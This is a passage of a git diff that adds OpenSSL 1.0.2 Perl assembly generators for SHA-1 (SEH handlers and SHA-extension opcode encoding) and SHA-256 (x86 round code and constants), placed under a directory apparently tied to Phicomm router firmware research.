+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lcommon_seh_tail
+
+	mov	`16*4`(%rax),%rax	# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+
+	jmp	.Lcommon_seh_tail
+.size	se_handler,.-se_handler
+___
+
+$code.=<<___ if ($shaext);
+.type	shaext_handler,\@abi-omnipotent
+.align	16
+shaext_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lprologue_shaext(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lprologue
+	jb	.Lcommon_seh_tail
+
+	lea	.Lepilogue_shaext(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lcommon_seh_tail
+
+	lea	-8-4*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$8,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+	jmp	.Lcommon_seh_tail
+.size	shaext_handler,.-shaext_handler
+___
+
+$code.=<<___;
+.type	ssse3_handler,\@abi-omnipotent
+.align	16
+ssse3_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	mov	232($context),%rax	# pull context->R14
+
+	lea	-40-6*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$12,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore cotnext->R12
+	mov	%r13,224($context)	# restore cotnext->R13
+	mov	%r14,232($context)	# restore cotnext->R14
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	ssse3_handler,.-ssse3_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_sha1_block_data_order
+	.rva	.LSEH_end_sha1_block_data_order
+	.rva	.LSEH_info_sha1_block_data_order
+___
+$code.=<<___ if ($shaext);
+	.rva	.LSEH_begin_sha1_block_data_order_shaext
+	.rva	.LSEH_end_sha1_block_data_order_shaext
+	.rva	.LSEH_info_sha1_block_data_order_shaext
+___
+$code.=<<___;
+	.rva	.LSEH_begin_sha1_block_data_order_ssse3
+	.rva	.LSEH_end_sha1_block_data_order_ssse3
+	.rva	.LSEH_info_sha1_block_data_order_ssse3
+___
+$code.=<<___ if ($avx);
+	.rva	.LSEH_begin_sha1_block_data_order_avx
+	.rva	.LSEH_end_sha1_block_data_order_avx
+	.rva	.LSEH_info_sha1_block_data_order_avx
+___
+$code.=<<___ if ($avx>1);
+	.rva	.LSEH_begin_sha1_block_data_order_avx2
+	.rva	.LSEH_end_sha1_block_data_order_avx2
+	.rva	.LSEH_info_sha1_block_data_order_avx2
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_sha1_block_data_order:
+	.byte	9,0,0,0
+	.rva	se_handler
+___
+$code.=<<___ if ($shaext);
+.LSEH_info_sha1_block_data_order_shaext:
+	.byte	9,0,0,0
+	.rva	shaext_handler
+___
+$code.=<<___;
+.LSEH_info_sha1_block_data_order_ssse3:
+	.byte	9,0,0,0
+	.rva	ssse3_handler
+	.rva	.Lprologue_ssse3,.Lepilogue_ssse3	# HandlerData[]
+___
+$code.=<<___ if ($avx);
+.LSEH_info_sha1_block_data_order_avx:
+	.byte	9,0,0,0
+	.rva	ssse3_handler
+	.rva	.Lprologue_avx,.Lepilogue_avx		# HandlerData[]
+___
+$code.=<<___ if ($avx>1);
+.LSEH_info_sha1_block_data_order_avx2:
+	.byte	9,0,0,0
+	.rva	ssse3_handler
+	.rva	.Lprologue_avx2,.Lepilogue_avx2		# HandlerData[]
+___
+}
+
+####################################################################
+
+sub sha1rnds4 {
+    if (@_[0] =~ /\$([x0-9a-f]+),\s*%xmm([0-7]),\s*%xmm([0-7])/) {
+      my @opcode=(0x0f,0x3a,0xcc);
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	my $c=$1;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return "sha1rnds4\t".@_[0];
+    }
+}
+
+sub sha1op38 {
+    my $instr = shift;
+    my %opcodelet = (
+		"sha1nexte" => 0xc8,
+  		"sha1msg1"  => 0xc9,
+		"sha1msg2"  => 0xca	);
+
+    if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x38);
+      my $rex=0;
+	$rex|=0x04			if ($2>=8);
+	$rex|=0x01			if ($1>=8);
+	unshift @opcode,0x40|$rex	if ($rex);
+	push @opcode,$opcodelet{$instr};
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return $instr."\t".@_[0];
+    }
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/geo;
+
+	s/\b(sha1rnds4)\s+(.*)/sha1rnds4($2)/geo	or
+	s/\b(sha1[^\s]*)\s+(.*)/sha1op38($1,$2)/geo;
+
+	print $_,"\n";
+}
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-586.pl
new file mode 100644
index 0000000..6462e45
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-586.pl
@@ -0,0 +1,1281 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# SHA256 block transform for x86. September 2007.
+#
+# Performance improvement over compiler generated code varies from
+# 10% to 40% [see below]. Not very impressive on some µ-archs, but
+# it's 5 times smaller and optimizies amount of writes.
+#
+# May 2012.
+#
+# Optimization including two of Pavel Semjanov's ideas, alternative
+# Maj and full unroll, resulted in ~20-25% improvement on most CPUs,
+# ~7% on Pentium, ~40% on Atom. As fully unrolled loop body is almost
+# 15x larger, 8KB vs. 560B, it's fired only for longer inputs. But not
+# on P4, where it kills performance, nor Sandy Bridge, where folded
+# loop is approximately as fast...
+#
+# June 2012.
+#
+# Add AMD XOP-specific code path, >30% improvement on Bulldozer over
+# May version, >60% over original. Add AVX+shrd code path, >25%
+# improvement on Sandy Bridge over May version, 60% over original.
+#
+# May 2013.
+#
+# Replace AMD XOP code path with SSSE3 to cover more processors.
+# (Biggest improvement coefficient is on upcoming Atom Silvermont,
+# not shown.) Add AVX+BMI code path.
+#
+# March 2014.
+#
+# Add support for Intel SHA Extensions.
+#
+# Performance in clock cycles per processed byte (less is better):
+#
+#		gcc	icc	x86 asm(*)	SIMD	x86_64 asm(**)	
+# Pentium	46	57	40/38		-	-
+# PIII		36	33	27/24		-	-
+# P4		41	38	28		-	17.3
+# AMD K8	27	25	19/15.5		-	14.9
+# Core2		26	23	18/15.6		14.3	13.8
+# Westmere	27	-	19/15.7		13.4	12.3
+# Sandy Bridge	25	-	15.9		12.4	11.6
+# Ivy Bridge	24	-	15.0		11.4	10.3
+# Haswell	22	-	13.9		9.46	7.80
+# Bulldozer	36	-	27/22		17.0	13.6
+# VIA Nano	36	-	25/22		16.8	16.5
+# Atom		50	-	30/25		21.9	18.9
+# Silvermont	40	-	34/31		22.9	20.6
+#
+# (*)	numbers after slash are for unrolled loop, where applicable;
+# (**)	x86_64 assembly performance is presented for reference
+#	purposes, results are best-available;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"sha512-586.pl",$ARGV[$#ARGV] eq "386");
+
+$xmm=$avx=0;
+for (@ARGV) { $xmm=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+if ($xmm &&	`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+			=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if ($xmm && !$avx && $ARGV[0] eq "win32n" &&
+		`nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.03) + ($1>=2.10);
+}
+
+if ($xmm && !$avx && $ARGV[0] eq "win32" &&
+		`ml 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if ($xmm && !$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+$shaext=$xmm;	### set to zero if compiling for 1.0.1
+
+$unroll_after = 64*4;	# If pre-evicted from L1P cache first spin of
+			# fully unrolled loop was measured to run about
+			# 3-4x slower. If slowdown coefficient is N and
+			# unrolled loop is m times faster, then you break
+			# even at (N-1)/(m-1) blocks. Then it needs to be
+			# adjusted for probability of code being evicted,
+			# code size/cache size=1/4. Typical m is 1.15...
+
+$A="eax";
+$E="edx";
+$T="ebx";
+$Aoff=&DWP(4,"esp");
+$Boff=&DWP(8,"esp");
+$Coff=&DWP(12,"esp");
+$Doff=&DWP(16,"esp");
+$Eoff=&DWP(20,"esp");
+$Foff=&DWP(24,"esp");
+$Goff=&DWP(28,"esp");
+$Hoff=&DWP(32,"esp");
+$Xoff=&DWP(36,"esp");
+$K256="ebp";
+
+sub BODY_16_63() {
+	&mov	($T,"ecx");			# "ecx" is preloaded
+	 &mov	("esi",&DWP(4*(9+15+16-14),"esp"));
+	&ror	("ecx",18-7);
+	 &mov	("edi","esi");
+	&ror	("esi",19-17);
+	 &xor	("ecx",$T);
+	 &shr	($T,3);
+	&ror	("ecx",7);
+	 &xor	("esi","edi");
+	 &xor	($T,"ecx");			# T = sigma0(X[-15])
+	&ror	("esi",17);
+	 &add	($T,&DWP(4*(9+15+16),"esp"));	# T += X[-16]
+	&shr	("edi",10);
+	 &add	($T,&DWP(4*(9+15+16-9),"esp"));	# T += X[-7]
+	#&xor	("edi","esi")			# sigma1(X[-2])
+	# &add	($T,"edi");			# T += sigma1(X[-2])
+	# &mov	(&DWP(4*(9+15),"esp"),$T);	# save X[0]
+
+	&BODY_00_15(1);
+}
+sub BODY_00_15() {
+    my $in_16_63=shift;
+
+	&mov	("ecx",$E);
+	 &xor	("edi","esi")			if ($in_16_63);	# sigma1(X[-2])
+	 &mov	("esi",$Foff);
+	&ror	("ecx",25-11);
+	 &add	($T,"edi")			if ($in_16_63);	# T += sigma1(X[-2])
+	 &mov	("edi",$Goff);
+	&xor	("ecx",$E);
+	 &xor	("esi","edi");
+	 &mov	($T,&DWP(4*(9+15),"esp"))	if (!$in_16_63);
+	 &mov	(&DWP(4*(9+15),"esp"),$T)	if ($in_16_63);	# save X[0]
+	&ror	("ecx",11-6);
+	 &and	("esi",$E);
+	 &mov	($Eoff,$E);		# modulo-scheduled
+	&xor	($E,"ecx");
+	 &add	($T,$Hoff);		# T += h
+	 &xor	("esi","edi");		# Ch(e,f,g)
+	&ror	($E,6);			# Sigma1(e)
+	 &mov	("ecx",$A);
+	 &add	($T,"esi");		# T += Ch(e,f,g)
+
+	&ror	("ecx",22-13);
+	 &add	($T,$E);		# T += Sigma1(e)
+	 &mov	("edi",$Boff);
+	&xor	("ecx",$A);
+	 &mov	($Aoff,$A);		# modulo-scheduled
+	 &lea	("esp",&DWP(-4,"esp"));
+	&ror	("ecx",13-2);
+	 &mov	("esi",&DWP(0,$K256));
+	&xor	("ecx",$A);
+	 &mov	($E,$Eoff);		# e in next iteration, d in this one
+	 &xor	($A,"edi");		# a ^= b
+	&ror	("ecx",2);		# Sigma0(a)
+
+	 &add	($T,"esi");		# T+= K[i]
+	 &mov	(&DWP(0,"esp"),$A);	# (b^c) in next round
+	&add	($E,$T);		# d += T
+	 &and	($A,&DWP(4,"esp"));	# a &= (b^c)
+	&add	($T,"ecx");		# T += Sigma0(a)
+	 &xor	($A,"edi");		# h = Maj(a,b,c) = Ch(a^b,c,b)
+	 &mov	("ecx",&DWP(4*(9+15+16-1),"esp"))	if ($in_16_63);	# preload T
+	&add	($K256,4);
+	 &add	($A,$T);		# h += T
+}
+
+&external_label("OPENSSL_ia32cap_P")		if (!$i386);
+
+&function_begin("sha256_block_data_order");
+	&mov	("esi",wparam(0));	# ctx
+	&mov	("edi",wparam(1));	# inp
+	&mov	("eax",wparam(2));	# num
+	&mov	("ebx","esp");		# saved sp
+
+	&call	(&label("pic_point"));	# make it PIC!
+&set_label("pic_point");
+	&blindpop($K256);
+	&lea	($K256,&DWP(&label("K256")."-".&label("pic_point"),$K256));
+
+	&sub	("esp",16);
+	&and	("esp",-64);
+
+	&shl	("eax",6);
+	&add	("eax","edi");
+	&mov	(&DWP(0,"esp"),"esi");	# ctx
+	&mov	(&DWP(4,"esp"),"edi");	# inp
+	&mov	(&DWP(8,"esp"),"eax");	# inp+num*128
+	&mov	(&DWP(12,"esp"),"ebx");	# saved sp
+						if (!$i386 && $xmm) {
+	&picmeup("edx","OPENSSL_ia32cap_P",$K256,&label("K256"));
+	&mov	("ecx",&DWP(0,"edx"));
+	&mov	("ebx",&DWP(4,"edx"));
+	&test	("ecx",1<<20);		# check for P4
+	&jnz	(&label("loop"));
+	&mov	("edx",&DWP(8,"edx"))	if ($xmm);
+	&test	("ecx",1<<24);		# check for FXSR
+	&jz	($unroll_after?&label("no_xmm"):&label("loop"));
+	&and	("ecx",1<<30);		# mask "Intel CPU" bit
+	&and	("ebx",1<<28|1<<9);	# mask AVX and SSSE3 bits
+	&test	("edx",1<<29)		if ($shaext);	# check for SHA
+	&jnz	(&label("shaext"))	if ($shaext);
+	&or	("ecx","ebx");
+	&and	("ecx",1<<28|1<<30);
+	&cmp	("ecx",1<<28|1<<30);
+					if ($xmm) {
+	&je	(&label("AVX"))		if ($avx);
+	&test	("ebx",1<<9);		# check for SSSE3
+	&jnz	(&label("SSSE3"));
+					} else {
+	&je	(&label("loop_shrd"));
+					}
+						if ($unroll_after) {
+&set_label("no_xmm");
+	&sub	("eax","edi");
+	&cmp	("eax",$unroll_after);
+	&jae	(&label("unrolled"));
+						} }
+	&jmp	(&label("loop"));
+
+sub COMPACT_LOOP() {
+my $suffix=shift;
+
+&set_label("loop$suffix",$suffix?32:16);
+    # copy input block to stack reversing byte and dword order
+    for($i=0;$i<4;$i++) {
+	&mov	("eax",&DWP($i*16+0,"edi"));
+	&mov	("ebx",&DWP($i*16+4,"edi"));
+	&mov	("ecx",&DWP($i*16+8,"edi"));
+	&bswap	("eax");
+	&mov	("edx",&DWP($i*16+12,"edi"));
+	&bswap	("ebx");
+	&push	("eax");
+	&bswap	("ecx");
+	&push	("ebx");
+	&bswap	("edx");
+	&push	("ecx");
+	&push	("edx");
+    }
+	&add	("edi",64);
+	&lea	("esp",&DWP(-4*9,"esp"));# place for A,B,C,D,E,F,G,H
+	&mov	(&DWP(4*(9+16)+4,"esp"),"edi");
+
+	# copy ctx->h[0-7] to A,B,C,D,E,F,G,H on stack
+	&mov	($A,&DWP(0,"esi"));
+	&mov	("ebx",&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edi",&DWP(12,"esi"));
+	# &mov	($Aoff,$A);
+	&mov	($Boff,"ebx");
+	&xor	("ebx","ecx");
+	&mov	($Coff,"ecx");
+	&mov	($Doff,"edi");
+	&mov	(&DWP(0,"esp"),"ebx");	# magic
+	&mov	($E,&DWP(16,"esi"));	
+	&mov	("ebx",&DWP(20,"esi"));
+	&mov	("ecx",&DWP(24,"esi"));
+	&mov	("edi",&DWP(28,"esi"));
+	# &mov	($Eoff,$E);
+	&mov	($Foff,"ebx");
+	&mov	($Goff,"ecx");
+	&mov	($Hoff,"edi");
+
+&set_label("00_15$suffix",16);
+
+	&BODY_00_15();
+
+	&cmp	("esi",0xc19bf174);
+	&jne	(&label("00_15$suffix"));
+
+	&mov	("ecx",&DWP(4*(9+15+16-1),"esp"));	# preloaded in BODY_00_15(1)
+	&jmp	(&label("16_63$suffix"));
+
+&set_label("16_63$suffix",16);
+
+	&BODY_16_63();
+
+	&cmp	("esi",0xc67178f2);
+	&jne	(&label("16_63$suffix"));
+
+	&mov	("esi",&DWP(4*(9+16+64)+0,"esp"));#ctx
+	# &mov	($A,$Aoff);
+	&mov	("ebx",$Boff);
+	# &mov	("edi",$Coff);
+	&mov	("ecx",$Doff);
+	&add	($A,&DWP(0,"esi"));
+	&add	("ebx",&DWP(4,"esi"));
+	&add	("edi",&DWP(8,"esi"));
+	&add	("ecx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"esi"),$A);
+	&mov	(&DWP(4,"esi"),"ebx");
+	&mov	(&DWP(8,"esi"),"edi");
+	&mov	(&DWP(12,"esi"),"ecx");
+	# &mov	($E,$Eoff);
+	&mov	("eax",$Foff);
+	&mov	("ebx",$Goff);
+	&mov	("ecx",$Hoff);
+	&mov	("edi",&DWP(4*(9+16+64)+4,"esp"));#inp
+	&add	($E,&DWP(16,"esi"));
+	&add	("eax",&DWP(20,"esi"));
+	&add	("ebx",&DWP(24,"esi"));
+	&add	("ecx",&DWP(28,"esi"));
+	&mov	(&DWP(16,"esi"),$E);
+	&mov	(&DWP(20,"esi"),"eax");
+	&mov	(&DWP(24,"esi"),"ebx");
+	&mov	(&DWP(28,"esi"),"ecx");
+
+	&lea	("esp",&DWP(4*(9+16+64),"esp"));# destroy frame
+	&sub	($K256,4*64);			# rewind K
+
+	&cmp	("edi",&DWP(8,"esp"));		# are we done yet?
+	&jb	(&label("loop$suffix"));
+}
+	&COMPACT_LOOP();
+	&mov	("esp",&DWP(12,"esp"));		# restore sp
+&function_end_A();
+						if (!$i386 && !$xmm) {
+	# ~20% improvement on Sandy Bridge
+	local *ror = sub { &shrd(@_[0],@_) };
+	&COMPACT_LOOP("_shrd");
+	&mov	("esp",&DWP(12,"esp"));		# restore sp
+&function_end_A();
+						}
+
+&set_label("K256",64);	# Yes! I keep it in the code segment!
+@K256=(	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,
+	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5,
+	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,
+	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174,
+	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,
+	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,
+	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,
+	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967,
+	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,
+	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85,
+	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,
+	0xd192e819,0xd6990624,0xf40e3585,0x106aa070,
+	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,
+	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,
+	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,
+	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2	);
+&data_word(@K256);
+&data_word(0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f);	# byte swap mask
+&asciz("SHA256 block transform for x86, CRYPTOGAMS by <appro\@openssl.org>");
+
+($a,$b,$c,$d,$e,$f,$g,$h)=(0..7);	# offsets
+sub off { &DWP(4*(((shift)-$i)&7),"esp"); }
+
+if (!$i386 && $unroll_after) {
+my @AH=($A,$K256);
+
+&set_label("unrolled",16);
+	&lea	("esp",&DWP(-96,"esp"));
+	# copy ctx->h[0-7] to A,B,C,D,E,F,G,H on stack
+	&mov	($AH[0],&DWP(0,"esi"));
+	&mov	($AH[1],&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("ebx",&DWP(12,"esi"));
+	#&mov	(&DWP(0,"esp"),$AH[0]);
+	&mov	(&DWP(4,"esp"),$AH[1]);
+	&xor	($AH[1],"ecx");		# magic
+	&mov	(&DWP(8,"esp"),"ecx");
+	&mov	(&DWP(12,"esp"),"ebx");
+	&mov	($E,&DWP(16,"esi"));	
+	&mov	("ebx",&DWP(20,"esi"));
+	&mov	("ecx",&DWP(24,"esi"));
+	&mov	("esi",&DWP(28,"esi"));
+	#&mov	(&DWP(16,"esp"),$E);
+	&mov	(&DWP(20,"esp"),"ebx");
+	&mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esp"),"esi");
+	&jmp	(&label("grand_loop"));
+
+&set_label("grand_loop",16);
+    # copy input block to stack reversing byte order
+    for($i=0;$i<5;$i++) {
+	&mov	("ebx",&DWP(12*$i+0,"edi"));
+	&mov	("ecx",&DWP(12*$i+4,"edi"));
+	&bswap	("ebx");
+	&mov	("esi",&DWP(12*$i+8,"edi"));
+	&bswap	("ecx");
+	&mov	(&DWP(32+12*$i+0,"esp"),"ebx");
+	&bswap	("esi");
+	&mov	(&DWP(32+12*$i+4,"esp"),"ecx");
+	&mov	(&DWP(32+12*$i+8,"esp"),"esi");
+    }
+	&mov	("ebx",&DWP($i*12,"edi"));
+	&add	("edi",64);
+	&bswap	("ebx");
+	&mov	(&DWP(96+4,"esp"),"edi");
+	&mov	(&DWP(32+12*$i,"esp"),"ebx");
+
+    my ($t1,$t2) = ("ecx","esi");
+
+    for ($i=0;$i<64;$i++) {
+
+      if ($i>=16) {
+	&mov	($T,$t1);			# $t1 is preloaded
+	# &mov	($t2,&DWP(32+4*(($i+14)&15),"esp"));
+	&ror	($t1,18-7);
+	 &mov	("edi",$t2);
+	&ror	($t2,19-17);
+	 &xor	($t1,$T);
+	 &shr	($T,3);
+	&ror	($t1,7);
+	 &xor	($t2,"edi");
+	 &xor	($T,$t1);			# T = sigma0(X[-15])
+	&ror	($t2,17);
+	 &add	($T,&DWP(32+4*($i&15),"esp"));	# T += X[-16]
+	&shr	("edi",10);
+	 &add	($T,&DWP(32+4*(($i+9)&15),"esp"));	# T += X[-7]
+	#&xor	("edi",$t2)			# sigma1(X[-2])
+	# &add	($T,"edi");			# T += sigma1(X[-2])
+	# &mov	(&DWP(4*(9+15),"esp"),$T);	# save X[0]
+      }
+	&mov	($t1,$E);
+	 &xor	("edi",$t2)			if ($i>=16);	# sigma1(X[-2])
+	 &mov	($t2,&off($f));
+	&ror	($E,25-11);
+	 &add	($T,"edi")			if ($i>=16);	# T += sigma1(X[-2])
+	 &mov	("edi",&off($g));
+	&xor	($E,$t1);
+	 &mov	($T,&DWP(32+4*($i&15),"esp"))	if ($i<16);	# X[i]
+	 &mov	(&DWP(32+4*($i&15),"esp"),$T)	if ($i>=16 && $i<62);	# save X[0]
+	 &xor	($t2,"edi");
+	&ror	($E,11-6);
+	 &and	($t2,$t1);
+	 &mov	(&off($e),$t1);		# save $E, modulo-scheduled
+	&xor	($E,$t1);
+	 &add	($T,&off($h));		# T += h
+	 &xor	("edi",$t2);		# Ch(e,f,g)
+	&ror	($E,6);			# Sigma1(e)
+	 &mov	($t1,$AH[0]);
+	 &add	($T,"edi");		# T += Ch(e,f,g)
+
+	&ror	($t1,22-13);
+	 &mov	($t2,$AH[0]);
+	 &mov	("edi",&off($b));
+	&xor	($t1,$AH[0]);
+	 &mov	(&off($a),$AH[0]);	# save $A, modulo-scheduled
+	 &xor	($AH[0],"edi");		# a ^= b, (b^c) in next round
+	&ror	($t1,13-2);
+	 &and	($AH[1],$AH[0]);	# (b^c) &= (a^b)
+	 &lea	($E,&DWP(@K256[$i],$T,$E));	# T += Sigma1(1)+K[i]
+	&xor	($t1,$t2);
+	 &xor	($AH[1],"edi");		# h = Maj(a,b,c) = Ch(a^b,c,b)
+	 &mov	($t2,&DWP(32+4*(($i+2)&15),"esp"))	if ($i>=15 && $i<63);
+	&ror	($t1,2);		# Sigma0(a)
+
+	 &add	($AH[1],$E);		# h += T
+	 &add	($E,&off($d));		# d += T
+	&add	($AH[1],$t1);		# h += Sigma0(a)
+	 &mov	($t1,&DWP(32+4*(($i+15)&15),"esp"))	if ($i>=15 && $i<63);
+
+	@AH = reverse(@AH);		# rotate(a,h)
+	($t1,$t2) = ($t2,$t1);		# rotate(t1,t2)
+    }
+	&mov	("esi",&DWP(96,"esp"));	#ctx
+					#&mov	($AH[0],&DWP(0,"esp"));
+	&xor	($AH[1],"edi");		#&mov	($AH[1],&DWP(4,"esp"));
+					#&mov	("edi", &DWP(8,"esp"));
+	&mov	("ecx",&DWP(12,"esp"));
+	&add	($AH[0],&DWP(0,"esi"));
+	&add	($AH[1],&DWP(4,"esi"));
+	&add	("edi",&DWP(8,"esi"));
+	&add	("ecx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"esi"),$AH[0]);
+	&mov	(&DWP(4,"esi"),$AH[1]);
+	&mov	(&DWP(8,"esi"),"edi");
+	&mov	(&DWP(12,"esi"),"ecx");
+	 #&mov	(&DWP(0,"esp"),$AH[0]);
+	 &mov	(&DWP(4,"esp"),$AH[1]);
+	 &xor	($AH[1],"edi");		# magic
+	 &mov	(&DWP(8,"esp"),"edi");
+	 &mov	(&DWP(12,"esp"),"ecx");
+	#&mov	($E,&DWP(16,"esp"));
+	&mov	("edi",&DWP(20,"esp"));
+	&mov	("ebx",&DWP(24,"esp"));
+	&mov	("ecx",&DWP(28,"esp"));
+	&add	($E,&DWP(16,"esi"));
+	&add	("edi",&DWP(20,"esi"));
+	&add	("ebx",&DWP(24,"esi"));
+	&add	("ecx",&DWP(28,"esi"));
+	&mov	(&DWP(16,"esi"),$E);
+	&mov	(&DWP(20,"esi"),"edi");
+	&mov	(&DWP(24,"esi"),"ebx");
+	&mov	(&DWP(28,"esi"),"ecx");
+	 #&mov	(&DWP(16,"esp"),$E);
+	 &mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+	 &mov	(&DWP(24,"esp"),"ebx");
+	 &mov	(&DWP(28,"esp"),"ecx");
+
+	&cmp	("edi",&DWP(96+8,"esp"));	# are we done yet?
+	&jb	(&label("grand_loop"));
+
+	&mov	("esp",&DWP(96+12,"esp"));	# restore sp
+&function_end_A();
+}
+						if (!$i386 && $xmm) {{{
+if ($shaext) {
+######################################################################
+# Intel SHA Extensions implementation of SHA256 update function.
+#
+my ($ctx,$inp,$end)=("esi","edi","eax");
+my ($Wi,$ABEF,$CDGH,$TMP)=map("xmm$_",(0..2,7));
+my @MSG=map("xmm$_",(3..6));
+
+sub sha256op38 {
+ my ($opcodelet,$dst,$src)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
